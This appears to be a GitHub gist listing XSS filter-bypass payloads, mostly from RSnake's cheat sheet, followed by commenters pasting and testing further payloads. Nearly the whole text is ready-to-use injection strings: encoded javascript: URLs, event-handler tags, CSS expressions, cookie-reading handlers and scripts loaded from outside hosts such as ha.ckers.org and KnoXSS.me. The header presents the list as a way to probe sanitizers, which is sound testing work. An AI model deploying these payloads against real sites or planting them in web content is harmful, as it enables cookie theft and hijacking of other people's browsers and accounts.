XSS Filter Bypass List

Note: most of these payloads are taken from RSnake's XSS cheat sheet (the same set is shipped as "rsnake" wordlists in OWASP, fuzzdb and SecLists). Many rely on legacy engine behaviour — `javascript:` URLs in IMG/BGSOUND/BODY BACKGROUND, IE `expression()` and `.htc` behaviors, `-moz-binding`, `vbscript:`/`livescript:` URLs, UTF-7 charset auto-detection, SSI/PHP injection — and will not execute in current browsers. Use the list to probe how a filter or sanitizer normalises input (case, whitespace, entity decoding, nested tags), and confirm any hit in the target's real rendering context before reporting it as exploitable.
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>

ninja25538 commented Aug 8, 2017

Nice!, Thanks!


Noob-Walid commented Oct 12, 2017

which worked most??


Amarnath403 commented Apr 6, 2018

test


CesBear commented May 8, 2018

cool


xeno6696 commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.


0xINT3 commented Sep 1, 2018

many don't even work. websites are getting smart. :/


sittminzaw commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work


IvanGuGon1 commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>


Marshmellow471 commented Jan 26, 2019

rip github xss protection


Marshmellow471 commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >


Marshmellow471 commented Jan 26, 2019

start with > and without the spaces


Marshmellow471 commented Jan 26, 2019

fuck


Marshmellow471 commented Jan 26, 2019

<h1>no</h1>


Marshmellow471 commented Jan 26, 2019

no


shamrocksu88 commented Feb 1, 2019

KNOX


shamrocksu88 commented Feb 1, 2019

KNOX


shamrocksu88 commented Feb 1, 2019

S05PWA==


shamrocksu88 commented Feb 1, 2019

PDFLTk9YPDE=


shamrocksu88 commented Feb 1, 2019

'"KNOX


shamrocksu88 commented Feb 1, 2019

KNOX\


shamrocksu88 commented Feb 1, 2019

confirmK


shamrocksu88 commented Feb 1, 2019

(confirm)(1)


shamrocksu88 commented Feb 1, 2019

'-confirmK-'


shamrocksu88 commented Feb 1, 2019

"-confirmK-"


shamrocksu88 commented Feb 1, 2019

${(confirm)(1)}


shamrocksu88 commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>


nizeman72 commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>


nizeman72 commented Feb 12, 2019

iji


nizeman72 commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>

nizeman72 commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>

nizeman72 commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>


nizeman72 commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >


nizeman72 commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>


nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>


nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>


nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>



nizeman72 commented Feb 16, 2019

Lol


nizeman72 commented Feb 16, 2019

test


nizeman72 commented Feb 16, 2019

<script>alert(fuck)</script>